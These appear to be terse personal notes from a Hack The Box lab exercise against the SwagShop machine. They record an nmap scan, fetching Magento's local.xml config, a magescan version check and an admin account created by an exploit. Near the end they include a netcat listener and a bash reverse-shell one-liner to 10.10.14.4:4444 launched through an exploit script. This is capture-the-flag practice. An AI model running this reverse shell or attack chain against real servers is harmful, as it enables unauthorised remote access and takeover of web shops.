2025-04-04T08:07:59-04:00

sudo apt install -y nmap curl python3-venv make zip unzip
sudo openvpn --config htb.ovpn

### T1 10.129.232.93

ping -c 1 10.129.232.93
nmap -sV -T4 10.129.232.93

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

up, ports open

10.129.232.93 swagshop.htb

curl -L http://swagshop.htb/app/etc/local.xml

magneto software
10.129.232.93 swagshop.htb


curl -L -O https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar
 
  Magento Information
+-----------+------------------+
| Parameter | Value            |
+-----------+------------------+
| Edition   | Community        |
| Version   | 1.9.0.0, 1.9.0.1 |
+-----------+------------------+

2025-04-04T08:28:28-04:00 WORKED
Check http://swagshop.htb/admin with creds ypwq:123
masq succes


2025-04-04T08:39:33-04:00
nc -l -p 4444
python3 exp.py http://swagshop.htb/index.php/admin /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'
success

running find
exit